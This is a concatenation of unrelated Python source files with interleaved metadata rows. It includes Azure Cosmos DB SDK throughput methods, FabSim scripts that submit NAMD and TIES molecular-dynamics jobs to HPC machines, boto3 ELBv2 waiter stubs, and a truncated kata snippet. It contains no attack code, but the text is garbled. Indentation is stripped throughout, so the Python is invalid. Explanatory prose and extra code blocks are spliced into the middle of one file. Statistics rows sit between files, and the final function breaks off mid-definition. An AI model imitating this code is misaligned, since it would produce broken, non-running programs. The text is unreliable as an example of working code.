def get_gremlin_graph_throughput(
self, resource_group_name, account_name, database_name, graph_name, custom_headers=None, raw=False, **operation_config):
"""Gets the Gremlin graph throughput under an existing Azure Cosmos DB
database account with the provided name.
:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param database_name: Cosmos DB database name.
:type database_name: str
:param graph_name: Cosmos DB graph name.
:type graph_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: Throughput or ClientRawResponse if raw=true
:rtype: ~azure.mgmt.cosmosdb.models.Throughput or
~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.get_gremlin_graph_throughput.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
'databaseName': self._serialize.url("database_name", database_name, 'str'),
'graphName': self._serialize.url("graph_name", graph_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('Throughput', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_gremlin_graph_throughput.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/gremlin/databases/{databaseName}/graphs/{graphName}/settings/throughput'}
def _update_gremlin_graph_throughput_initial(
self, resource_group_name, account_name, database_name, graph_name, resource, custom_headers=None, raw=False, **operation_config):
update_throughput_parameters = models.ThroughputUpdateParameters(resource=resource)
# Construct URL
url = self.update_gremlin_graph_throughput.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
'databaseName': self._serialize.url("database_name", database_name, 'str'),
'graphName': self._serialize.url("graph_name", graph_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(update_throughput_parameters, 'ThroughputUpdateParameters')
# Construct and send request
request = self._client.put(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200, 202]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('Throughput', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def update_gremlin_graph_throughput(
self, resource_group_name, account_name, database_name, graph_name, resource, custom_headers=None, raw=False, polling=True, **operation_config):
"""Update RUs per second of an Azure Cosmos DB Gremlin graph.
:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param database_name: Cosmos DB database name.
:type database_name: str
:param graph_name: Cosmos DB graph name.
:type graph_name: str
:param resource: The standard JSON format of a resource throughput
:type resource: ~azure.mgmt.cosmosdb.models.ThroughputResource
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns Throughput or
ClientRawResponse<Throughput> if raw==True
:rtype:
~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.cosmosdb.models.Throughput]
or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[~azure.mgmt.cosmosdb.models.Throughput]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._update_gremlin_graph_throughput_initial(
resource_group_name=resource_group_name,
account_name=account_name,
database_name=database_name,
graph_name=graph_name,
resource=resource,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
deserialized = self._deserialize('Throughput', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
update_gremlin_graph_throughput.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/gremlin/databases/{databaseName}/graphs/{graphName}/settings/throughput'}
# ---- second/data/__init__.py (repo: lpj0822/pointpillars_train, license: MIT) ----
from . import kitti_dataset
from . import nuscenes_dataset
from . import my_dataset
# ---- DEPRECATED_PYTHON_SRC/component/ui.py (repo: djgroen/firefly-proxy, license: BSD-2-Clause) ----
import os
import sys
if os.name == 'nt':
from component._ui_win import UI
elif sys.platform == "darwin":
from component._ui_mac import UI
# ---- deploy/BioMD/fabBioMD.py (repo: djgroen/FabSim, license: BSD-3-Clause) ----
# -*- coding: utf-8 -*-
#
# This source file is part of the FabSim software toolkit, which is distributed under the BSD 3-Clause license.
# Please refer to LICENSE for detailed information regarding the licensing.
#
# This file contains FabSim definitions specific to FabBioMD.
import sys  # used by sys.exit() in dir_structure below

from ..fab import *
# Add local script, blackbox and template path.
add_local_paths("BioMD")
@task
def namd(config,**args):
"""Submit a NAMD job to the remote queue.
The job results will be stored with a name pattern as defined in the environment,
e.g. cylinder-abcd1234-legion-256
config : config directory to use to define geometry, e.g. config=cylinder
Keyword arguments:
cores : number of compute cores to request
images : number of images to take
    steering : steering session ID
wall_time : wall-time job limit
memory : memory per node
"""
if not args.get('cores'):
args["cores"] = 32
update_environment(args)
with_config(config)
execute(put_configs,config)
job(dict(script='namd',
wall_time='1:00:00',memory='2G',job_type='parallel',job_class='micro'),args)
@task
def bac_namd_archerlike(config,**args):
"""Submit ensemble NAMD equilibration-simulation jobs to the ARCHER or similar machines.
The job results will be stored with a name pattern as defined in the environment,
e.g. cylinder-abcd1234-legion-256
config : config directory to use to define geometry, e.g. config=cylinder
Keyword arguments:
cores : number of compute cores to request
stages : this is usually 11 for equilibration (WT case) and 4 for simulation
wall_time : wall-time job limit
memory : memory per node
"""
if not args.get('cores'):
args["cores"] = 2400
update_environment(args)
with_config(config)
execute(put_configs,config)
job(dict(script=env.bac_ensemble_namd_script,
stages_eq=11, stages_sim=1, replicas=25, wall_time='24:00:00',memory='2G'),args)
@task
def bac_namd_hartreelike(config,**args):
"""Submits ensemble NAMD equilibration-simulation jobs to HARTREE or similar machines.
The job results will be stored with a name pattern as defined in the environment,
e.g. cylinder-abcd1234-legion-256
config : config directory to use to define geometry, e.g. config=cylinder
Keyword arguments:
cores : number of compute cores to request
stages : this is usually 11 for equilibration (WT case) and 4 for simulation
wall_time : wall-time job limit
memory : memory per node
    mem : memory of the nodes requested on Bluewonder Phase 1. The default is 32000;
          higher-memory nodes can be requested with other values, e.g. 64000 for >64 GB nodes.
"""
if not args.get('cores'):
args["cores"] = 384
update_environment(args)
if not env.get('replicas'):
env.update(dict(replicas=25))
        print("WARNING: replicas argument not specified. Setting a default value of", env.replicas)
# sys.exit()
with_config(config)
execute(put_configs,config)
    for ri in range(1, int(env.replicas) + 1):
job(dict(script=env.bac_ensemble_namd_script,
stages_eq=11, stages_sim=1, wall_time='6:00', memory='2G', mem=25000, replicas=env.replicas, replica_index=ri),args)
@task
def bac_ties_archerlike(config,**args):
    """Submit ensemble TIES jobs to ARCHER or similar machines.
    Assumes the directory structure has already been prepared using FabSim's dir_structure function.
    """
if not args.get('cores'):
args["cores"] = 6240
update_environment(args)
# Workaround to ensure env.cores is set before we calculate cores_per_lambda.
if not env.get('replicas'):
env.replicas=5
if not env.get('lambda_list'):
env.update(dict(lambda_list= '0.00 0.05 0.10 0.20 0.30 0.40 0.50 0.60 0.70 0.80 0.90 0.95 1.00'))
        print("WARNING: lambda_list argument not specified. Setting a default value of", env.lambda_list)
with_config(config)
execute(put_configs,config)
    env.cores_per_lambda = int(env.cores) // len(env.lambda_list.split(" "))
    env.cores_per_replica_per_lambda = int(env.cores_per_lambda) // int(env.replicas)
job(dict(script=env.bac_ties_script, stages_eq=11, stages_sim=1, wall_time='12:00:00', memory='2G'),args)
# for i in env.lambda_list.split(" "):
# run("rsync -avz --exclude 'LAMBDA_*' %s/ %s/LAMBDA_%.2f/" % (env.job_config_path, env.job_config_path, float(i)))
# job(dict(script=env.bac_ties_script,cores=960, stages_eq=11, stages_sim=1, replicas=10, lambda_list=env.lambda_list, lambda_index='%.2f' % float(i), wall_time='12:00:00', memory='2G'),args)
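The two divisions above split the core budget evenly, first over lambda windows and then over replicas. With the defaults in this file (6240 cores, 13 lambda values, 5 replicas) that gives 480 cores per lambda and 96 per replica per lambda. A standalone sketch of that bookkeeping (the helper name is ours, only the arithmetic is from the task above):

```python
DEFAULT_LAMBDAS = "0.00 0.05 0.10 0.20 0.30 0.40 0.50 0.60 0.70 0.80 0.90 0.95 1.00"

def partition_cores(cores, lambda_list=DEFAULT_LAMBDAS, replicas=5):
    """Even split of a core budget: per lambda window, then per replica.

    Mirrors the integer divisions in bac_ties_archerlike."""
    cores_per_lambda = cores // len(lambda_list.split(" "))
    cores_per_replica_per_lambda = cores_per_lambda // replicas
    return cores_per_lambda, cores_per_replica_per_lambda
```

With the SuperMUC default of 18200 cores the same split gives 1400 and 280.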
@task
def bac_namd_supermuclike(config,**args):
"""Submit ensemble NAMD equilibration-simulation jobs to the SuperMUC or similar machines.
The job results will be stored with a name pattern as defined in the environment,
e.g. cylinder-abcd1234-legion-256
config : config directory to use to define geometry, e.g. config=cylinder
Keyword arguments:
cores : number of compute cores to request
stages : this is usually 11 for equilibration (WT case) and 4 for simulation
wall_time : wall-time job limit
memory : memory per node
"""
if not args.get('cores'):
args["cores"] = 7000
update_environment(args)
if not env.get('replicas'):
env.replicas=25
calc_nodes()
env.nodes_new = "%s" % (int(env.nodes)+1)
    env.cores_per_replica = int(env.cores) // int(env.replicas)
if not env.get('nodes_per_replica'):
        env.update(dict(nodes_per_replica=int(env.cores_per_replica) // int(env.corespernode)))
with_config(config)
local("cp %s/redis_header.txt %s" % (env.local_templates_path[-1], env.job_config_path_local))
execute(put_configs,config)
job(dict(script=env.bac_ensemble_namd_script,
stages_eq=11, stages_sim=1, wall_time='06:00:00',memory='2G', job_type='MPICH', job_class='general', island_count='1', nodes_new=env.nodes_new),args)
@task
def bac_ties_supermuclike(config,**args):
    """Submit ensemble TIES jobs to SuperMUC or similar machines.
    Assumes the directory structure has already been prepared using FabSim's dir_structure function.
    """
# Workaround to ensure env.cores is set before we calculate cores_per_lambda.
if not args.get('cores'):
args["cores"] = 18200
update_environment(args)
if not env.get('replicas'):
env.replicas=5
if not env.get('lambda_list'):
env.update(dict(lambda_list= '0.00 0.05 0.10 0.20 0.30 0.40 0.50 0.60 0.70 0.80 0.90 0.95 1.00'))
        print("WARNING: lambda_list argument not specified. Setting a default value of", env.lambda_list)
    env.cores_per_lambda = int(env.cores) // len(env.lambda_list.split(" "))
    env.cores_per_replica_per_lambda = int(env.cores_per_lambda) // int(env.replicas)
if not env.get('nodes_per_replica_per_lambda'):
        env.update(dict(nodes_per_replica_per_lambda=int(env.cores_per_replica_per_lambda) // int(env.corespernode)))
calc_nodes()
env.nodes_new = "%s" % (int(env.nodes)+1)
with_config(config)
local("cp %s/redis_header.txt %s" % (env.local_templates_path[-1], env.job_config_path_local))
execute(put_configs,config)
job(dict(script=env.bac_ties_script, stages_eq=11, stages_sim=1, wall_time='06:00:00', memory='2G', job_type='MPICH', job_class='general', island_count='1', nodes_new=env.nodes_new),args)
@task
def bac_nmode_archerlike(config,**args):
"""Submit ensemble NMODE/MMPB(GB)SA jobs to the ARCHER or similar machines.
The job results will be stored with a name pattern as defined in the environment,
e.g. cylinder-abcd1234-legion-256
config : config directory to use to define geometry, e.g. config=cylinder
Keyword arguments:
cores : number of compute cores to request
wall_time : wall-time job limit
memory : memory per node
"""
if not args.get('cores'):
args["cores"] = 240
update_environment(args)
with_config(config)
execute(put_configs,config)
job(dict(script=env.bac_ensemble_nmode_script,
replicas=5, wall_time='12:00:00',memory='2G'),args)
@task
def bac_nmode_hartreelike(config,**args):
"""Submits ensemble NMODE/MMPB(GB)SA equilibration-simulation jobs to HARTREE or similar machines.
The job results will be stored with a name pattern as defined in the environment,
e.g. cylinder-abcd1234-legion-256
config : config directory to use to define geometry, e.g. config=cylinder
Keyword arguments:
cores : number of compute cores to request
stages : this is usually 11 for equilibration (WT case) and 4 for simulation
wall_time : wall-time job limit
memory : memory per node
    mem : memory of the nodes requested on Bluewonder Phase 1. The default is 32000;
          higher-memory nodes can be requested with other values, e.g. 64000 for >64 GB nodes.
"""
if not args.get('cores'):
args["cores"] = 24
update_environment(args)
if not env.get('replicas'):
env.update(dict(replicas=25))
        print("WARNING: replicas argument not specified. Setting a default value of", env.replicas)
# sys.exit()
with_config(config)
execute(put_configs,config)
    for ri in range(1, int(env.replicas) + 1):
job(dict(script=env.bac_ensemble_nmode_script,
wall_time='24:00', memory='2G', mem=25000, replica_index=ri),args)
@task
def bac_nm_remote_archerlike(**args):
"""Submit ensemble NMODE/MMPB(GB)SA jobs to the ARCHER or similar machines,
when the simulation data is already on the remote machine.
The job results will be stored with a name pattern as defined in the environment,
e.g. cylinder-abcd1234-legion-256
config : config directory to use to define geometry, e.g. config=cylinder
Keyword arguments:
cores : number of compute cores to request
wall_time : wall-time job limit
memory : memory per node
remote_path : The path of root directory where all data of ensemble jobs is located;
to be provided by user as an argument
"""
if not args.get('cores'):
args["cores"] = 1200
update_environment(args)
with_config('')
#execute(put_configs,config)
#print "$results_path"
job(dict(config='',script=env.bac_ensemble_nm_remote_script,
replicas=25, wall_time='24:00:00',memory='2G'),args)
@task
def bac_nm_remote_hartreelike(**args):
"""Submits ensemble NMODE/MMPB(GB)SA equilibration-simulation jobs to HARTREE or similar machines,
when the simulation data is already on the remote machine.
The job results will be stored with a name pattern as defined in the environment,
e.g. cylinder-abcd1234-legion-256
config : config directory to use to define geometry, e.g. config=cylinder
Keyword arguments:
cores : number of compute cores to request
stages : this is usually 11 for equilibration (WT case) and 4 for simulation
wall_time : wall-time job limit
memory : memory per node
    mem : memory of the nodes requested on Bluewonder Phase 1. The default is 32000;
          higher-memory nodes can be requested with other values, e.g. 64000 for >64 GB nodes.
remote_path : The path of root directory where all data of ensemble jobs is located;
to be provided by user as an argument
"""
if not args.get('cores'):
args["cores"] = 24
update_environment(args)
if not env.get('replicas'):
env.update(dict(replicas=25))
        print("WARNING: replicas argument not specified. Setting a default value of", env.replicas)
# sys.exit()
with_config('')
#execute(put_configs,config)
    for ri in range(1, int(env.replicas) + 1):
job(dict(config='',script=env.bac_ensemble_nm_remote_script,
wall_time='24:00', memory='2G', mem=25000, replica_index=ri),args)
@task
def find_namd_executable():
"""
Searches module system to locate a NAMD executable.
"""
namd_modules = probe('namd')
    print(namd_modules)
for line in namd_modules.split("\n"):
if "(" in line:
            print(line)
            stripped_line = (line.strip()).split("(")
            print("which namd2")
            namd = run("module load %s && which namd2" % stripped_line[0])
            print("FabMD: NAMD executable is located at:", namd)
            return namd
    print("No relevant modules found. Trying a basic which command.")
namd = run("which namd2")
return namd
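`find_namd_executable` picks the first probe line containing a parenthesis and takes the text left of it as the module name. A standalone sketch of just that parsing step (the helper name and the sample module listing are hypothetical):

```python
def pick_module_name(probe_output):
    """Return the module name from `module avail`-style output, as
    find_namd_executable does: first line containing '(', split at the
    parenthesis, keep the left part. None if no such line exists."""
    for line in probe_output.split("\n"):
        if "(" in line:
            return line.strip().split("(")[0]
    return None
```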
@task
def dir_structure(num_rep,path):
    """ Creates the directory structure for ensemble simulations from the initial directory structure created by BAC builder.
    num_rep is the number of replicas desired; path is the full path (up to rep0) of the original directory created by BAC builder. """
    if len(num_rep) < 1:
        print("error: number of replicas not defined.")
        sys.exit()
    if len(path) < 1:
        print("error: path of rep0 not defined.")
        sys.exit()
    print("restructuring directory for ensemble simulations")
local("mkdir -p %s/replicas/rep1" % path)
for d in ['data', 'dcds', 'analysis_scripts', 'run_scripts']:
local("rm -r %s/%s" % (path, d))
for d in ['equilibration','simulation']:
local("mv %s/%s %s/replicas/rep1 2>/dev/null; true" % (path, d, path))
local("mv %s/fe-calc/build/* %s/build/ ; rm -r %s/fe-calc" % (path, path, path))
local("mkdir -p %s/replicas/rep1/fe-calc" % path)
    for x in range(2, int(num_rep) + 1):
local("cp -r %s/replicas/rep1 %s/replicas/rep%s" % (path, path, x))
local("cp %s/fep.tcl %s" % (env.local_templates_path[0], path))
| 40.909657 | 194 | 0.721368 | 2,075 | 13,132 | 4.457349 | 0.145542 | 0.023354 | 0.011893 | 0.012974 | 0.814034 | 0.789815 | 0.765813 | 0.747 | 0.737377 | 0.736512 | 0 | 0.034309 | 0.167682 | 13,132 | 320 | 195 | 41.0375 | 0.811894 | 0.070362 | 0 | 0.608696 | 0 | 0.018634 | 0.208589 | 0.007596 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.006211 | null | null | 0.080745 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
6e35d9a6654f48da341874d047b5cb20f5607160 | 11,704 | py | Python | boto3_type_annotations_with_docs/boto3_type_annotations/elbv2/waiter.py | cowboygneox/boto3_type_annotations | 450dce1de4e066b939de7eac2ec560ed1a7ddaa2 | [
"MIT"
] | 119 | 2018-12-01T18:20:57.000Z | 2022-02-02T10:31:29.000Z | boto3_type_annotations_with_docs/boto3_type_annotations/elbv2/waiter.py | cowboygneox/boto3_type_annotations | 450dce1de4e066b939de7eac2ec560ed1a7ddaa2 | [
"MIT"
] | 15 | 2018-11-16T00:16:44.000Z | 2021-11-13T03:44:18.000Z | boto3_type_annotations_with_docs/boto3_type_annotations/elbv2/waiter.py | cowboygneox/boto3_type_annotations | 450dce1de4e066b939de7eac2ec560ed1a7ddaa2 | [
"MIT"
] | 11 | 2019-05-06T05:26:51.000Z | 2021-09-28T15:27:59.000Z | from typing import Dict
from typing import List
from botocore.waiter import Waiter
class LoadBalancerAvailable(Waiter):
def wait(self, LoadBalancerArns: List = None, Names: List = None, Marker: str = None, PageSize: int = None, WaiterConfig: Dict = None):
"""
Polls :py:meth:`ElasticLoadBalancingv2.Client.describe_load_balancers` every 15 seconds until a successful state is reached. An error is returned after 40 failed checks.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/elasticloadbalancingv2-2015-12-01/DescribeLoadBalancers>`_
**Request Syntax**
::
waiter.wait(
LoadBalancerArns=[
'string',
],
Names=[
'string',
],
Marker='string',
PageSize=123,
WaiterConfig={
'Delay': 123,
'MaxAttempts': 123
}
)
:type LoadBalancerArns: list
:param LoadBalancerArns:
The Amazon Resource Names (ARN) of the load balancers. You can specify up to 20 load balancers in a single call.
- *(string) --*
:type Names: list
:param Names:
The names of the load balancers.
- *(string) --*
:type Marker: string
:param Marker:
The marker for the next set of results. (You received this marker from a previous call.)
:type PageSize: integer
:param PageSize:
The maximum number of results to return with this call.
:type WaiterConfig: dict
:param WaiterConfig:
A dictionary that provides parameters to control waiting behavior.
- **Delay** *(integer) --*
The amount of time in seconds to wait between attempts. Default: 15
- **MaxAttempts** *(integer) --*
The maximum number of attempts to be made. Default: 40
:returns: None
"""
pass
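These generated stubs only document behavior: poll every 15 seconds, give up after 40 failed checks (a 600-second budget). A minimal sketch of that Delay/MaxAttempts contract in plain Python — this is not boto3's actual waiter implementation, and the helper name is ours:

```python
import time

def wait_until(check, delay=15, max_attempts=40, sleep=time.sleep):
    """Poll `check` every `delay` seconds, raising after `max_attempts`
    failed checks. Returns the (1-based) attempt on which it succeeded."""
    for attempt in range(max_attempts):
        if check():
            return attempt + 1
        sleep(delay)
    raise TimeoutError("no success after %d attempts" % max_attempts)
```

Passing a no-op `sleep` makes the loop testable without waiting out the budget.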
class LoadBalancerExists(Waiter):
def wait(self, LoadBalancerArns: List = None, Names: List = None, Marker: str = None, PageSize: int = None, WaiterConfig: Dict = None):
"""
Polls :py:meth:`ElasticLoadBalancingv2.Client.describe_load_balancers` every 15 seconds until a successful state is reached. An error is returned after 40 failed checks.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/elasticloadbalancingv2-2015-12-01/DescribeLoadBalancers>`_
**Request Syntax**
::
waiter.wait(
LoadBalancerArns=[
'string',
],
Names=[
'string',
],
Marker='string',
PageSize=123,
WaiterConfig={
'Delay': 123,
'MaxAttempts': 123
}
)
:type LoadBalancerArns: list
:param LoadBalancerArns:
The Amazon Resource Names (ARN) of the load balancers. You can specify up to 20 load balancers in a single call.
- *(string) --*
:type Names: list
:param Names:
The names of the load balancers.
- *(string) --*
:type Marker: string
:param Marker:
The marker for the next set of results. (You received this marker from a previous call.)
:type PageSize: integer
:param PageSize:
The maximum number of results to return with this call.
:type WaiterConfig: dict
:param WaiterConfig:
A dictionary that provides parameters to control waiting behavior.
- **Delay** *(integer) --*
The amount of time in seconds to wait between attempts. Default: 15
- **MaxAttempts** *(integer) --*
The maximum number of attempts to be made. Default: 40
:returns: None
"""
pass
class LoadBalancersDeleted(Waiter):
def wait(self, LoadBalancerArns: List = None, Names: List = None, Marker: str = None, PageSize: int = None, WaiterConfig: Dict = None):
"""
Polls :py:meth:`ElasticLoadBalancingv2.Client.describe_load_balancers` every 15 seconds until a successful state is reached. An error is returned after 40 failed checks.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/elasticloadbalancingv2-2015-12-01/DescribeLoadBalancers>`_
**Request Syntax**
::
waiter.wait(
LoadBalancerArns=[
'string',
],
Names=[
'string',
],
Marker='string',
PageSize=123,
WaiterConfig={
'Delay': 123,
'MaxAttempts': 123
}
)
:type LoadBalancerArns: list
:param LoadBalancerArns:
The Amazon Resource Names (ARN) of the load balancers. You can specify up to 20 load balancers in a single call.
- *(string) --*
:type Names: list
:param Names:
The names of the load balancers.
- *(string) --*
:type Marker: string
:param Marker:
The marker for the next set of results. (You received this marker from a previous call.)
:type PageSize: integer
:param PageSize:
The maximum number of results to return with this call.
:type WaiterConfig: dict
:param WaiterConfig:
A dictionary that provides parameters to control waiting behavior.
- **Delay** *(integer) --*
The amount of time in seconds to wait between attempts. Default: 15
- **MaxAttempts** *(integer) --*
The maximum number of attempts to be made. Default: 40
:returns: None
"""
pass
class TargetDeregistered(Waiter):
def wait(self, TargetGroupArn: str, Targets: List = None, WaiterConfig: Dict = None):
"""
Polls :py:meth:`ElasticLoadBalancingv2.Client.describe_target_health` every 15 seconds until a successful state is reached. An error is returned after 40 failed checks.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/elasticloadbalancingv2-2015-12-01/DescribeTargetHealth>`_
**Request Syntax**
::
waiter.wait(
TargetGroupArn='string',
Targets=[
{
'Id': 'string',
'Port': 123,
'AvailabilityZone': 'string'
},
],
WaiterConfig={
'Delay': 123,
'MaxAttempts': 123
}
)
:type TargetGroupArn: string
:param TargetGroupArn: **[REQUIRED]**
The Amazon Resource Name (ARN) of the target group.
:type Targets: list
:param Targets:
The targets.
- *(dict) --*
Information about a target.
- **Id** *(string) --* **[REQUIRED]**
The ID of the target. If the target type of the target group is ``instance`` , specify an instance ID. If the target type is ``ip`` , specify an IP address. If the target type is ``lambda`` , specify the ARN of the Lambda function.
- **Port** *(integer) --*
The port on which the target is listening.
- **AvailabilityZone** *(string) --*
An Availability Zone or ``all`` . This determines whether the target receives traffic from the load balancer nodes in the specified Availability Zone or from all enabled Availability Zones for the load balancer.
This parameter is not supported if the target type of the target group is ``instance`` .
If the target type is ``ip`` and the IP address is in a subnet of the VPC for the target group, the Availability Zone is automatically detected and this parameter is optional. If the IP address is outside the VPC, this parameter is required.
With an Application Load Balancer, if the target type is ``ip`` and the IP address is outside the VPC for the target group, the only supported value is ``all`` .
If the target type is ``lambda`` , this parameter is optional and the only supported value is ``all`` .
:type WaiterConfig: dict
:param WaiterConfig:
A dictionary that provides parameters to control waiting behavior.
- **Delay** *(integer) --*
The amount of time in seconds to wait between attempts. Default: 15
- **MaxAttempts** *(integer) --*
The maximum number of attempts to be made. Default: 40
:returns: None
"""
pass
class TargetInService(Waiter):
def wait(self, TargetGroupArn: str, Targets: List = None, WaiterConfig: Dict = None):
"""
Polls :py:meth:`ElasticLoadBalancingv2.Client.describe_target_health` every 15 seconds until a successful state is reached. An error is returned after 40 failed checks.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/elasticloadbalancingv2-2015-12-01/DescribeTargetHealth>`_
**Request Syntax**
::
waiter.wait(
TargetGroupArn='string',
Targets=[
{
'Id': 'string',
'Port': 123,
'AvailabilityZone': 'string'
},
],
WaiterConfig={
'Delay': 123,
'MaxAttempts': 123
}
)
:type TargetGroupArn: string
:param TargetGroupArn: **[REQUIRED]**
The Amazon Resource Name (ARN) of the target group.
:type Targets: list
:param Targets:
The targets.
- *(dict) --*
Information about a target.
- **Id** *(string) --* **[REQUIRED]**
The ID of the target. If the target type of the target group is ``instance`` , specify an instance ID. If the target type is ``ip`` , specify an IP address. If the target type is ``lambda`` , specify the ARN of the Lambda function.
- **Port** *(integer) --*
The port on which the target is listening.
- **AvailabilityZone** *(string) --*
An Availability Zone or ``all`` . This determines whether the target receives traffic from the load balancer nodes in the specified Availability Zone or from all enabled Availability Zones for the load balancer.
This parameter is not supported if the target type of the target group is ``instance`` .
If the target type is ``ip`` and the IP address is in a subnet of the VPC for the target group, the Availability Zone is automatically detected and this parameter is optional. If the IP address is outside the VPC, this parameter is required.
With an Application Load Balancer, if the target type is ``ip`` and the IP address is outside the VPC for the target group, the only supported value is ``all`` .
If the target type is ``lambda`` , this parameter is optional and the only supported value is ``all`` .
:type WaiterConfig: dict
:param WaiterConfig:
A dictionary that provides parameters to control waiting behavior.
- **Delay** *(integer) --*
The amount of time in seconds to wait between attempts. Default: 15
- **MaxAttempts** *(integer) --*
The maximum number of attempts to be made. Default: 40
:returns: None
"""
pass
| 46.444444 | 255 | 0.581852 | 1,283 | 11,704 | 5.296181 | 0.124708 | 0.039735 | 0.022664 | 0.030905 | 0.975423 | 0.975423 | 0.975423 | 0.975423 | 0.975423 | 0.975423 | 0 | 0.018056 | 0.332792 | 11,704 | 251 | 256 | 46.629482 | 0.852094 | 0.76461 | 0 | 0.555556 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.277778 | false | 0.277778 | 0.166667 | 0 | 0.722222 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 9 |
6e534142ddb728479e711b8540a3bdc7ed2a0726 | 179 | py | Python | codewars/8kyu/doha22/kata8/removing_elements/removing_elements.py | doha22/Training_one | 0cd7cf86c7da0f6175834146296b763d1841766b | [
"MIT"
] | null | null | null | codewars/8kyu/doha22/kata8/removing_elements/removing_elements.py | doha22/Training_one | 0cd7cf86c7da0f6175834146296b763d1841766b | [
"MIT"
] | 2 | 2019-01-22T10:53:42.000Z | 2019-01-31T08:02:48.000Z | codewars/8kyu/doha22/kata8/removing_elements/removing_elements.py | doha22/Training_one | 0cd7cf86c7da0f6175834146296b763d1841766b | [
"MIT"
] | 13 | 2019-01-22T10:37:42.000Z | 2019-01-25T13:30:43.000Z | def remove_every_other(my_list):
    return my_list[::2]
def remove_every_other2(my_list):
